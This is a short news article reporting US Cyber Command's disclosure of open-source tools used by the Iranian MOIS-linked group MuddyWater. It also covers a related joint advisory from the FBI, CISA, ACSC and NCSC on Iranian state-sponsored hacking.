Open-source tools deployed by malicious Iran-based cyber actors have been exposed.
The US Cyber Command’s Cyber National Mission Force has identified and disclosed multiple open-source tools leveraged by Iranian intelligence across networks around the world.
Referred to as “MuddyWater” – a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS) – the actors primarily target Middle Eastern nations but have more recently sought to undermine European and North American networks.
According to the Congressional Research Service, the MOIS conducts domestic surveillance to identify regime opponents and surveil anti-regime activists abroad through a network of agents placed in Iran’s embassies.
The US Cyber Command has warned that the presence of multiple open-source tools on the same network could be an indicator of the presence of Iranian malicious cyber actors.
Specifically, methods employed by the state-sponsored actors include sideloading DLLs to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.
This latest announcement from US Cyber Command comes just months after multinational cyber agencies observed an Iranian government-sponsored APT group exploiting Microsoft Exchange vulnerabilities to undermine critical infrastructure.
Iranian government-sponsored APT actors have actively targeted a broad range of victims across both the public and private sector from within the US and in partner nations, including Australia.
The joint cyber security advisory followed a joint investigation among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom’s National Cyber Security Centre (NCSC).